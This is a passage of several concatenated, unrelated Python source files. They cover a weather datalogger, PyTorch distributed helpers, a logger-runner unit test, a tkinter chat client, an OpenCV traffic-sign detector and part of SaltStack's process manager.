temperature = str(round((main_inf['temp'] - 273), 2))
humidity = main_inf['humidity']
pressure = main_inf['pressure']
report = data['weather'][0]['description']
response.close()
return {"city": city_name, "temperature": temperature, "humidity": humidity,
"pressure": pressure, "report": report}
else:
logging.error("Error in the weather HTTP request")
response.close()
return None
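# For reference, the OpenWeatherMap fields consumed above look roughly like
# this (values illustrative):
#
#   {"main": {"temp": 287.6, "humidity": 72, "pressure": 1014},
#    "weather": [{"description": "light rain"}]}
#
# 'temp' arrives in kelvin, hence the (temp - 273) conversion to Celsius.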
def send_datalog() -> bool:
try:
logging.info("Sending weather request")
weather_data = get_weather()
if weather_data:
logging.info(f"Got weather in {str(weather_data['city'])}")
weather_report = f'Weather in {str(weather_data["city"])} at {str(datetime.datetime.now())} is: ' \
f'temperature: {str(weather_data["temperature"])} ' \
f'humidity: {str(weather_data["humidity"])} ' \
f'pressure: {str(weather_data["pressure"])} ' \
f'report: {str(weather_data["report"])}'
logging.info("Sending datalog")
interface.record_datalog(weather_report)
return True
else:
# weather_data is None in this branch, so there is no 'city' to report
interface.record_datalog(f'Failed to get current weather at {datetime.datetime.now()}')
return False
except Exception as e:
logging.error(f"Failed to send datalog: {e}")
return False
if __name__ == '__main__':
seed = sys.argv[1]
interface = RI.RobonomicsInterface(seed=seed)
logging.info(f"Reading Cities list")
with open('city.list.json') as json_file:
city_list = json.load(json_file)
len_city_list = len(city_list)
while True:
threads_num = threading.active_count()
if threads_num > 12:
logging.warning(f"Too many active threads: {threads_num}. Idling")
time.sleep(12)
continue
send_datalog_thread = threading.Thread(target=send_datalog)
send_datalog_thread.start()
time.sleep(2)
logging.info(f"Active threads count: {threads_num}")
|
distributed.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Distributed helpers."""
import multiprocessing
import os
import signal
import threading
import traceback
import torch
from xnas.core.config import cfg
def is_master_proc():
"""Determines if the current process is the master process.
Master process is responsible for logging, writing and loading checkpoints. In
the multi GPU setting, we assign the master role to the rank 0 process. When
training using a single GPU, there is a single process which is considered master.
"""
return cfg.NUM_GPUS == 1 or torch.distributed.get_rank() == 0
def init_process_group(proc_rank, world_size):
"""Initializes the default process group."""
# Set the GPU to use
torch.cuda.set_device(proc_rank)
# Initialize the process group
torch.distributed.init_process_group(
backend=cfg.DIST_BACKEND,
init_method="tcp://{}:{}".format(cfg.HOST, cfg.PORT),
world_size=world_size,
rank=proc_rank,
)
def destroy_process_group():
"""Destroys the default process group."""
torch.distributed.destroy_process_group()
def scaled_all_reduce(tensors):
"""Performs the scaled all_reduce operation on the provided tensors.
The input tensors are modified in-place. Currently supports only the sum
reduction operator. The reduced values are scaled by the inverse size of the
process group (equivalent to cfg.NUM_GPUS).
"""
# There is no need for reduction in the single-proc case
if cfg.NUM_GPUS == 1:
return tensors
# Queue the reductions
reductions = []
for tensor in tensors:
reduction = torch.distributed.all_reduce(tensor, async_op=True)
reductions.append(reduction)
# Wait for reductions to finish
for reduction in reductions:
reduction.wait()
# Scale the results
for tensor in tensors:
tensor.mul_(1.0 / cfg.NUM_GPUS)
return tensors
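# A typical (hypothetical) use is averaging gradients across ranks after a
# backward pass; the reduction happens in-place, so no reassignment is needed:
#
#   grads = [p.grad for p in model.parameters() if p.grad is not None]
#   scaled_all_reduce(grads)  # each rank now holds the sum scaled by 1/NUM_GPUS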
class ChildException(Exception):
"""Wraps an exception from a child process."""
def __init__(self, child_trace):
super(ChildException, self).__init__(child_trace)
class ErrorHandler(object):
"""Multiprocessing error handler (based on fairseq's).
Listens for errors in child processes and propagates the tracebacks to the parent.
"""
def __init__(self, error_queue):
# Shared error queue
self.error_queue = error_queue
# Children processes sharing the error queue
self.children_pids = []
# Start a thread listening to errors
self.error_listener = threading.Thread(target=self.listen, daemon=True)
self.error_listener.start()
# Register the signal handler
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
"""Registers a child process."""
self.children_pids.append(pid)
def listen(self):
"""Listens for errors in the error queue."""
# Wait until there is an error in the queue
child_trace = self.error_queue.get()
# Put the error back for the signal handler
self.error_queue.put(child_trace)
# Invoke the signal handler
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, _sig_num, _stack_frame):
"""Signal handler."""
# Kill children processes
for pid in self.children_pids:
os.kill(pid, signal.SIGINT)
# Propagate the error from the child process
raise ChildException(self.error_queue.get())
def run(proc_rank, world_size, error_queue, fun, fun_args, fun_kwargs):
"""Runs a function from a child process."""
try:
# Initialize the process group
init_process_group(proc_rank, world_size)
# Run the function
fun(*fun_args, **fun_kwargs)
except KeyboardInterrupt:
# Killed by the parent process
pass
except Exception:
# Propagate exception to the parent process
error_queue.put(traceback.format_exc())
finally:
# Destroy the process group
destroy_process_group()
def multi_proc_run(num_proc, fun, fun_args=(), fun_kwargs=None):
"""Runs a function in a multi-proc setting (unless num_proc == 1)."""
# There is no need for multi-proc in the single-proc case
fun_kwargs = fun_kwargs if fun_kwargs else {}
if num_proc == 1:
fun(*fun_args, **fun_kwargs)
return
# Handle errors from training subprocesses
error_queue = multiprocessing.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Run each training subprocess
ps = []
for i in range(num_proc):
p_i = multiprocessing.Process(
target=run, args=(i, num_proc, error_queue, fun, fun_args, fun_kwargs)
)
ps.append(p_i)
p_i.start()
error_handler.add_child(p_i.pid)
# Wait for each subprocess to finish
for p in ps:
p.join()
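# Sketch of a launcher entry point (train_model and its arguments are
# hypothetical):
#
#   if __name__ == '__main__':
#       multi_proc_run(cfg.NUM_GPUS, train_model, fun_args=(cfg,))
#
# With num_proc == 1 the function runs in-process; otherwise each child calls
# init_process_group() before running and errors surface via ErrorHandler.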
|
test_logger_runner.py | #!/usr/bin/env python3
import logging
import os
import sys
import tempfile
import threading
import time
import unittest
import warnings
sys.path.append('.')
from logger.readers.text_file_reader import TextFileReader
from logger.writers.text_file_writer import TextFileWriter
from server.logger_runner import LoggerRunner, run_logging
CONFIG = {
"modes": {
"off": {},
"on": {
"logger": {
"readers": {
"class": "TextFileReader",
"kwargs": {
"interval": 0.1,
"tail": True
} # we'll fill in filespec once we have tmpdir
},
"writers": {
"class": "TextFileWriter",
"kwargs": {} # we'll fill in filespec once we have tmpdir
}
}
}
},
"default_mode": "off"
}
SAMPLE_DATA = """Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation files
(the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell...""".split('\n')
################################################################################
class TestLoggerRunner(unittest.TestCase):
############################
def setUp(self):
# To suppress resource warnings about unclosed files
warnings.simplefilter("ignore", ResourceWarning)
# Create a file
self.temp_dir = tempfile.TemporaryDirectory()
self.temp_dir_name = self.temp_dir.name
self.source_name = self.temp_dir_name + '/source.txt'
self.dest_name = self.temp_dir_name + '/dest.txt'
# Create the source file
writer = TextFileWriter(self.source_name)
for line in SAMPLE_DATA:
writer.write(line)
# Fill in the readers and writers in the config
self.config = CONFIG
self.config['modes']['on']['logger']['readers']['kwargs']['file_spec'] = self.source_name
self.config['modes']['on']['logger']['writers']['kwargs']['filename'] = self.dest_name
############################
def test_basic(self):
# Assure ourselves that the dest file doesn't exist yet and that
# we're in our default mode
self.assertFalse(os.path.exists(self.dest_name))
runner = LoggerRunner(interval=0.1)
runner_thread = threading.Thread(target=runner.run, daemon=True)
runner_thread.start()
runner.set_configs(self.config['modes']['on'])
time.sleep(0.6)
reader = TextFileReader(self.dest_name)
for line in SAMPLE_DATA:
logging.info('Checking line: "%s"', line)
self.assertEqual(line, reader.read())
self.assertTrue(runner.processes['logger'].is_alive())
pid = runner.processes['logger'].pid
status = runner.check_loggers()
self.assertDictEqual(status,
{'logger': {'config': 'unknown',
'errors': [],
'running': True,
'pid': pid,
'failed': False}
})
runner.set_configs(self.config['modes']['off'])
time.sleep(0.1)
self.assertDictEqual(runner.check_loggers(), {})
# Verify that the process has indeed shut down. This should throw
# an exception if the process doesn't exist.
with self.assertRaises(ProcessLookupError):
os.kill(pid, 0)
# Try shutting down
runner.quit()
runner_thread.join(2.0)
self.assertFalse(runner_thread.is_alive())
################################################################################
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbosity', dest='verbosity',
default=0, action='count',
help='Increase output verbosity')
args = parser.parse_args()
LOGGING_FORMAT = '%(asctime)-15s %(message)s'
logging.basicConfig(format=LOGGING_FORMAT)
LOG_LEVELS = {0: logging.WARNING, 1: logging.INFO, 2: logging.DEBUG}
args.verbosity = min(args.verbosity, max(LOG_LEVELS))
logging.getLogger().setLevel(LOG_LEVELS[args.verbosity])
#logging.getLogger().setLevel(logging.DEBUG)
unittest.main(warnings='ignore')
|
client.py | import time
from tkinter import *
from PIL import Image, ImageTk
import socket
from time import sleep
import threading
import sys
c = socket.socket()
HOST = 'localhost'
PORT = 5000
HEADER = 1024
def connect_to_server():
global c
# retry in a loop rather than recursing, so a long outage cannot
# exhaust the call stack
while True:
try:
c.connect((HOST, PORT))
break
except socket.error as msg:
print('Connection error: ' + str(msg) + '. Retrying...')
sleep(1)
welcomeScreen()
def navigateToChatScreen(tk):
tk.destroy()
chatScreen()
def exitApp(tk):
c.send(bytes('exit', 'utf-8'))
tk.destroy()
def welcomeScreen():
def startfun(username, tk):
global c
if (len(username) == 0):
return
name = username
c.send(bytes(name, 'utf-8'))
navigateToChatScreen(tk)
tk = Tk()
tk.geometry("300x500")
tk.minsize(300, 500)
tk.maxsize(300, 500)
tk.config(bg="white")
resize_welcome_image = Image.open("welcome.png").resize((300, 250))
welcomeImg = ImageTk.PhotoImage(resize_welcome_image)
welcomeImage = Label(tk, image=welcomeImg, bg="white").place(x=0, y=0)
user_name = Label(tk, text="Username :", bg="white").place(x=10, y=280)
user_name_field = StringVar()
userNameBox = Entry(tk, textvariable=user_name_field, font=('calibre', 10, 'normal'), border=2, width=28)
userNameBox.place(x=80, y=280)
startChatImage = Image.open("start.png")
resize_chat_image = startChatImage.resize((100, 100))
startChatImg = ImageTk.PhotoImage(resize_chat_image)
startButton = Button(tk, image=startChatImg, command=lambda: startfun(user_name_field.get(), tk), borderwidth=0)
startButton.place(x=90, y=350)
tk.mainloop()
def chatScreen():
tk = Tk()
tk.geometry("300x500")
tk.minsize(300, 500)
tk.maxsize(300, 500)
tk.config(bg="white")
exitChatRoom = Image.open("exit.png")
resize_exit_image = exitChatRoom.resize((150, 50))
exitImg = ImageTk.PhotoImage(resize_exit_image)
exitButton = Button(tk, image=exitImg, bg="white", command=lambda: exitApp(tk), borderwidth=0)
exitButton.place(x=70, y=10)
messageListBox = Listbox(tk, height=20, width=43)
messageListBox.place(x=15, y=80)
message = StringVar()
messageBox = Entry(tk, textvariable=message, font=('calibre', 10, 'normal'), border=2, width=32)
messageBox.place(x=15, y=444)
sendMessageImage = Image.open("send.png")
resize_send_image = sendMessageImage.resize((30, 30))
sendImg = ImageTk.PhotoImage(resize_send_image)
sendButton = Button(tk, image=sendImg, bg="white", command=lambda: send_message(message.get()), borderwidth=0)
sendButton.place(x=250, y=440)
def handle_message():
global c
while True:
data = c.recv(HEADER).decode('utf-8')
if data == 'exit':
exit()
messageListBox.insert(messageListBox.size(), data)
print(data)
def send_message(msg):
global c
if (len(msg) == 0):
return
c.send(bytes(msg, 'utf-8'))
messageBox.delete(0, 'end')
messageListBox.insert(messageListBox.size(), "You: " + msg)
global t, t1
t = threading.Thread(target=handle_message)
t.start()
# pass the callable and its argument separately; calling send_message("")
# here would run it immediately and hand None to Thread as the target
t1 = threading.Thread(target=send_message, args=("",))
t1.start()
tk.mainloop()
global t, t1
connect_to_server()
t1.join()
t.join()
c.close()
exit(0) |
setup.py | import cv2
import numpy as np
import serial
import threading
from time import sleep
stop_Cascade = cv2.CascadeClassifier('stop_sign.xml')
speed_Cascade = cv2.CascadeClassifier('haarCascade.xml')
yield_Cascade = cv2.CascadeClassifier('yield.xml')
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('Alert.avi', fourcc, 10.0, (640,480))
#ser = serial.Serial("COM6", 9600, timeout=1)
cap = cv2.VideoCapture(0)
speed_Sign = False
stop_Sign = False
yield_Sign = False
"""def process():
while True:
print ('f')
global stop_Sign
if stop_Sign:
print("Stop ahead")
ser.write(b's')
ser.flush()
else :
ser.write(b'x')
print ("dfdg")
s=threading.Thread(target=process)
s.start()
"""
data = b'' # shared with the reader thread; bytes, matching ser.read()
def read():
global data
while True:
data = ser.read(9999)
if len(data) > 0:
print('Got:', data)
sleep(0.5)
print('not blocked')
# open the serial port and start the reader thread once, not on every frame
ser = serial.Serial("COM6", 9600, timeout=1)
if ser.isOpen():
ser.close()
ser.open()
t1 = threading.Thread(target=read, args=(), daemon=True)
t1.start()
while True:
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#Detecing the pannels
stop = stop_Cascade.detectMultiScale(gray,1.3,5)#Part of detection
speed = speed_Cascade.detectMultiScale(gray, 1.3, 5)
yield_sign = yield_Cascade.detectMultiScale(gray, 1.3, 5)
for(x,y,w,h) in stop :
cv2.rectangle(img,(x,y),(x+w,y+h),(100,100,0) , 2) # draw the rectangle around the yield sign
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img,'Stop',(x , y), font,1 ,(0,0,255), 2 , cv2.LINE_AA) #write in front of the detected object
stop_Sign = True
if data[0] == "j":
print("Stop ahead")
ser.write('s')
for(ex,ey,ew,eh) in speed :
cv2.rectangle(img, (ex, ey), (ex + ew, ey + eh), (100, 100, 0), 2) # draw the rectangle around the yield sign
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, 'Watch your speed"SPEED LIMIT"', (ex, ey), font, 1, (0, 0, 255), 3,cv2.LINE_AA) # write in front of the detected object
speed_Sign = True
if speed_Sign:
print("Watch your speed'SPEED LIMIT'")
ser.write(b'w')
for(gx,gy,gw,gh) in yield_sign :
cv2.rectangle(img, (gx, gy), (gx + gw, gy + gh), (100, 100, 0), 2) # draw the rectangle around the yield sign
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, 'Yield', (gx, gy), font, 1, (0, 0, 255), 3,cv2.LINE_AA) # write in front of the detected object
yield_Sign = True
if yield_Sign and data[:1] == b'j':
print("Yield Ahead")
ser.write(b'y')
cv2.imshow('img',img)
out.write(img)
k = cv2.waitKey(30) & 0xff
if k == 27:
break
ser.close()
cap.release()
out.release()
cv2.destroyAllWindows()
|
human_friendly.py | """This module manages the interaction with the user and
sends the user's commands to a file read by the artificial
primary investigator."""
normal = """The computer is currently running Theodore's AP Research project
between midnight and 2:30 pm. Type 'quit' to safely quit the program.
Type 'options' to get more options."""
options = """Type 'quit' to safely quit the program.
Type 'options' to get this options message.
Type 'adjourn' to get the program to cease operations until midnight.
Type 'reload' to tell the Artificial Primary Investigator (API) that conditions may have changed.
Type 'reset algorithm_name1 algorithm_name2' to get the API to reset all the trials where
algorithm_name1 was tested to see if it is evolutionary stable (ES) against algorithm_name2.
Type 'reset algorithm_name all' to get the API to reset all the trials where every algorithm was
tested to see if it is ES against algorithm_name.
Type 'reset all algorithm_name' to get the API to reset all the trials where algorithm_name was
tested to see if it is ES against all other algorithms.
Type 'reset all all' to get the API to reset ALL the trials. This is reversible, but you have to
know how API thinks. Be careful.
Type 'confidence value' to tell the API to reload and conduct trials aiming for confidence value.
You can set value to be anywhere in (0,1), but you probably want to choose 0.99 or 0.95, which
means that the API tries to become 99% sure that a strategy is (or isn't) ES against another.
Type 'max_trials value' to tell the API the maximum number of trials it can run where one
algorithm is testing for being ES against another. max_trials overrides
any consideration of confidence.
Type 'min_trials value' to tell the API the minimum number of trials it must run where one
algorithm is testing for being ES against another. min_trials overrides
any consideration of confidence.
Type 'max_time value' to tell the API the maximum amount of time (seconds) it can run where one
algorithm is testing for being ES against another. max_time overrides
any consideration of confidence or trials.
Type 'min_time value' to tell the API the minimum amount of time (seconds) it must run where one
algorithm is testing for being ES against another. min_time overrides
any consideration of confidence or trials.
Type 'redo_confidence' to tell the API that it needs to redo all the confidences, but the trials
can be left alone. (This is a good option after you have fixed a bug in bayesian.py.)
Type 'get_results' to tell the API to make a short version of all its confidences, which will be
saved in the Results folder."""
error = (
"""Sorry, I did not recognize that command. Are you sure you typed it correctly?"""
)
starting = """Starting the Artificial Primary Investigator (API)"""
quitting = """I told the Artificial Primary Investigator (API) to quit. It will quit in a few minutes."""
# done_quitting = '''I have quit.'''
work_during_day = """WARNING: The API is set up to always work, which could affect the results
Only proceed if you are testing the program, and please reset everything
afterwards."""
def main(daytime_run=False):
import time
import api
import os
try:
f = open("Results/human_friendly_to_api.txt", "a")
f.close()
except IOError:
os.system("mkdir Results")
try:
f = open("Results/Readable/testing.txt", "a")
f.close()
except IOError:
os.system("mkdir Results/Readable")
print(time.asctime() + ": " + starting)
if daytime_run:
print(time.asctime() + ": " + work_during_day)
# t1 = multiprocessing.Process( target = api.main, args = [daytime_run] )
# t1 = threading.Thread( target = api.main, args = [daytime_run] )
# t1.start()
# #Starts the API here, using multi-processing
# #so human_friendly will be free to continue
if not daytime_run:
os.system("python -c 'import api;api.main()' &")
else:
os.system("python -c 'import api;api.main(True)' &")
response = ""
while True:
print(time.asctime() + ": " + normal)
response_OK = False
while not response_OK:
response = input().lower().strip()
if formatted(response):
response_OK = True
else:
print(time.asctime() + ": " + error)
# Do something based on the response
if response == "options":
print(time.asctime() + ": " + options)
elif response == "quit":
break
else:
# Contact API with the message
f = open("Results/human_friendly_to_api.txt", "a")
f.write(str(time.time()) + ":" + response + "\n")
f.close()
# Contact API and tell it to quit
f = open("Results/human_friendly_to_api.txt", "a")
f.write(str(time.time()) + ":" + response + "\n")
f.close()
print(time.asctime() + ": " + quitting)
# #Wait until the API quits
# t1.join()
# print( time.asctime() + ": " + done_quitting )
def formatted(command):
"""Detects whether command is acceptable."""
if "official" in command:
return False
new = command.split()
if len(new) == 1:
return new[0] in [
"quit",
"options",
"adjourn",
"reload",
"redo_confidence",
"get_results",
]
elif len(new) == 3:
return new[0] in ["reset"]
elif len(new) == 2:
return new[0] in [
"confidence",
"min_trials",
"max_trials",
"min_time",
"max_time",
]
else:
return False
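# A minimal sketch (not part of the original module) of how `formatted`
# classifies commands, using only names defined in this file:
#
#   formatted("quit")            -> True   (recognized single-word command)
#   formatted("confidence 0.95") -> True   (recognized two-word form)
#   formatted("reset all all")   -> True   (recognized three-word reset form)
#   formatted("official reset")  -> False  (commands containing 'official' are rejected)
#   formatted("frobnicate")      -> False  (unknown command)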
|
process.py | # -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug('Created pidfile: {0}'.format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except (KeyError, IndexError):  # pwd.getpwnam raises KeyError for unknown users
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` attribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args: {1}'
' kwargs: {2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
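# A minimal usage sketch for ThreadPool (not part of the original module).
# As the class docstring notes, results are not returned; fire_async() only
# reports whether the job was accepted, returning False when the bounded
# queue is full instead of blocking:
#
#   pool = ThreadPool(num_threads=2, queue_size=10)
#   accepted = pool.fire_async(log.debug, args=['work item'])
#   if not accepted:
#       log.error('job queue is full, work item dropped')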
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a process with the given args + kwargs
This will determine if tgt is a Process class; otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transferred to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal):
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal)
except OSError as exc:
if exc.errno != errno.ESRCH:
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There is no SIGTERM handler installed, so install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There is no SIGINT handler installed, so install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.trace('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows() and not async:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
elif async is True:
yield gen.sleep(10)
elif async is False:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
# iterate over a copy because restart_process() mutates the map
for pid, mapping in six.iteritems(self._process_map.copy()):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid {0}: {1}'.format(pid, p_map['Process']))
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != errno.ESRCH:
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid {0}: {1}'.format(pid, p_map['Process']))
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid {0}: {1}'.format(pid, p_map['Process']))
try:
os.kill(pid, signal.SIGKILL)
except OSError:
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
